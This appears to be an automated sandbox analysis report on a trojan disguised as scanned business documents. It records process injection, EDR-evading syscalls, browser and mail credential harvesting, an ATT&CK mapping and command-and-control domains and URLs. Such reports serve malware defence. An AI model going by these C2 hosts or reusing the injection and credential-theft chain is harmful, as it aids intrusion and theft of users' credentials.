            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C30887 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CBC89D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C42840 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C60854 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C34859 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C34859 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CBE872 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe	Code function: 0_2_002E0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe	Code function: 0_2_002B2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe	Code function: 0_2_002A083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe	Code function: 0_2_002A09D5 SetUnhandledExceptionFilter
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe	Code function: 0_2_002A0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | NtAllocateVirtualMemory: Direct from: 0x76F03C9C
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | NtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | NtCreateKey: Direct from: 0x76F02C6C
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | NtSetInformationThread: Direct from: 0x76F02B4C
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | NtOpenSection: Direct from: 0x76F02E0C
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | NtSetInformationThread: Direct from: 0x76EF63F9
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BEC
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | NtCreateFile: Direct from: 0x76F02FEC
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | NtOpenFile: Direct from: 0x76F02DCC
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | NtTerminateThread: Direct from: 0x76F02FCC
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | NtProtectVirtualMemory: Direct from: 0x76EF7B2E
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | NtCreateMutant: Direct from: 0x76F035CC
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | NtResumeThread: Direct from: 0x76F036AC
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | NtReadFile: Direct from: 0x76F02ADC
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | NtDelayExecution: Direct from: 0x76F02DDC
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | NtResumeThread: Direct from: 0x76F02FBC
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | NtCreateUserProcess: Direct from: 0x76F0371C
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\schtasks.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: NULL target: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe protection: read write
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: NULL target: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\schtasks.exe | Thread register set: target process: 1508
            Source: C:\Windows\SysWOW64\schtasks.exe | Thread APC queued: target process: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 3135008
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002E1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_002E1201
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002C2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_002C2BA5
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002EB226 SendInput,keybd_event,0_2_002EB226
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_003022DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_003022DA
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe"
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\SysWOW64\schtasks.exe"
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002E0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_002E0B62
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002E1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_002E1663
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exe, MHFAGZiftf.exe, 00000003.00000000.1874031122.0000000001B31000.00000002.00000001.00040000.00000000.sdmp, MHFAGZiftf.exe, 00000003.00000002.4111597033.0000000001B30000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: MHFAGZiftf.exe, 00000003.00000000.1874031122.0000000001B31000.00000002.00000001.00040000.00000000.sdmp, MHFAGZiftf.exe, 00000003.00000002.4111597033.0000000001B30000.00000002.00000001.00040000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000000.2021600411.0000000000CD1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: MHFAGZiftf.exe, 00000003.00000000.1874031122.0000000001B31000.00000002.00000001.00040000.00000000.sdmp, MHFAGZiftf.exe, 00000003.00000002.4111597033.0000000001B30000.00000002.00000001.00040000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000000.2021600411.0000000000CD1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: MHFAGZiftf.exe, 00000003.00000000.1874031122.0000000001B31000.00000002.00000001.00040000.00000000.sdmp, MHFAGZiftf.exe, 00000003.00000002.4111597033.0000000001B30000.00000002.00000001.00040000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000000.2021600411.0000000000CD1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002A0698 cpuid 0_2_002A0698
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002F8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_002F8195
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002DD27A GetUserNameW,0_2_002DD27A
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002BBB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_002BBB6F
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_002842DE

            Stealing of Sensitive Information

            Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000001.00000002.1950883710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4110797200.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4111043032.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1951519783.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4111935021.0000000003C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4111848670.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.4113899205.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1951562901.0000000004990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\schtasks.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\schtasks.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\schtasks.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\schtasks.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\schtasks.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\schtasks.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\schtasks.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\schtasks.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\schtasks.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exe | Binary or memory string: WIN_81
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exe | Binary or memory string: WIN_XP
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exe | Binary or memory string: WIN_XPe
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exe | Binary or memory string: WIN_VISTA
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exe | Binary or memory string: WIN_7
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exe | Binary or memory string: WIN_8

            Remote Access Functionality

            Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000001.00000002.1950883710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4110797200.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4111043032.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1951519783.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4111935021.0000000003C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4111848670.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.4113899205.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1951562901.0000000004990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_00301204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00301204
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_00301806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00301806
            MITRE ATT&CK Matrix (one row per line, cells separated by "|"; a leading number is the report's count of matched signatures for that technique)

            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
            Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 2 Valid Accounts | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | 1 Scheduled Task/Job | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 3 Obfuscated Files or Information | NTDS | 116 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 DLL Side-Loading | LSA Secrets | 241 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 412 Process Injection | 2 Valid Accounts | Cached Domain Credentials | 12 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | 1 Scheduled Task/Job | 12 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 412 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            Behavior Graph (ID: 1488022)

            Sample: Scanned Docs from Emnes Met... | Startdate: 05/08/2024 | Architecture: WINDOWS | Score: 100
            Sample-level signatures: Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 7 other signatures
            Domains contacted at sample level: www.winkthree.com; www.synergon.space; 18 other IPs or domains

            Process tree as drawn in the graph:
            • Scanned Docs from Emnes Metal Sdn Bhd_.exe (started). Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process
              • svchost.exe (started). Signatures: Maps a DLL or memory area into another process
                • MHFAGZiftf.exe (injected). Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                  • schtasks.exe (started). Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                    • MHFAGZiftf.exe (injected). Signatures: Found direct / indirect Syscall (likely to bypass EDR). Network: www.slushcafe.top 203.161.55.102, ports 55423, 55424, 55425 (VNPT-AS-VNVNPTCorpVN, Malaysia); www.tqfabxah.com 35.241.42.217, ports 55431, 55432, 55433 (GOOGLEUS, United States); 8 other IPs or domains
                    • firefox.exe (started)

            Source | Detection | Scanner | Label | Link
            Scanned Docs from Emnes Metal Sdn Bhd_.exe | 71% | ReversingLabs | Win32.Trojan.Strictor |
            Scanned Docs from Emnes Metal Sdn Bhd_.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark | 0% | URL Reputation | safe |
            https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js | 0% | URL Reputation | safe |
            https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js | 0% | URL Reputation | safe |
            https://track.uc.cn/collect | 0% | URL Reputation | safe |
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
            https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
            https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js | 0% | URL Reputation | safe |
            https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
            https://hm.baidu.com/hm.js? | 0% | URL Reputation | safe |
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
            https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js | 0% | URL Reputation | safe |
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
            https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css | 0% | URL Reputation | safe |
            https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe |
            https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe |
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe |
            http://www.synergon.space/8unq/?GTP=uhqpjxIPh&efM=RkvL3PdT4df/OPkNHI4HmdhQbyPIEJeZ27MerosBZGKwWjBg2nbmkc0XZ9UwXf1WVngj3AiTKIg7OIM24x6mviVClJubTHF4ksIetQZZ+rgXL6Dldbwq0cw= | 0% | Avira URL Cloud | safe |
            http://www.slushcafe.top/irn0/?efM=rkk12BbGqxBZ8yyVdqr4fumsqySnbS/TKAT51RD3LUS3uLR6Pe1z8Bplr8mj2yMFe4BX6hO/FEyyRDMjbgdycpy6GTweDeod91OQcupKfuQbLLwzDVUdZDA=&GTP=uhqpjxIPh | 0% | Avira URL Cloud | safe |
            http://www.alanbeanart.com/7ie4/ | 0% | Avira URL Cloud | safe |
            http://www.lfghtko.lol/yxos/ | 0% | Avira URL Cloud | safe |
